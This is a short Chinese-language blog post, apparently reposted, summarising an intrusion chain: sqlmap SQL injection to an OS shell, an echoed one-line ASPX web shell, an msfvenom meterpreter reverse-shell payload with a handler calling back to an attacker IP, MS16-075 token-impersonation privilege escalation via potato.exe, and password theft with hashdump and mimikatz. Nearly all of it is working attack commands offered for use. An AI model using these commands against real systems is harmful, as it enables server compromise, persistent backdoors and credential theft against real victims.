sqlmap注入及ms16-075提权总结

sqlmap注入及ms16-075提权总结

(1)sqlmap执行命令

sqlmap.py -r 1**.***.***.***.txt

sqlmap.py -r 1**.***.***.***.txt --is-db

sqlmap.py -r 1**.***.***.***.txt --password --batch

sqlmap.py -r 1**.***.***.***.txt --os-shell

(2)os-shell下执行命令

ipconfig

dir c:/

echo "thisis test">e:\software\AMS_NoFlow\t.txt

echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > e:\software\AMS_NoFlow\cmd.aspx

(3)msf下执行命令

生成反弹×××:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4433 -f exe -o 4433.exe

(4)msf启动及监听

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.1.33(实际为外网IP地址)

set LPORT 4433

exploit  

(5)ms16-075提权命令

use incognito

list_tokens -u

execute -cH -f ./potato.exe

list_tokens -u 

impersonate_token "NT AUTHORITY\\SYSTEM"

getuid

(6)获取密码

run hashdump

(7)mimikatz进行密码获取

load mimikatz

kerberos、livessp、msv、ssp、tspkg、wdigest(逐个命令测试,有的会显示明文密码)

mimikatz_command:mimikatz命令提示窗口

(8)mimikatz命令行下获取密码(未做测试)

privilege::debug

sekurlsa::logonpasswords


猜你喜欢

转载自blog.51cto.com/simeon/2124798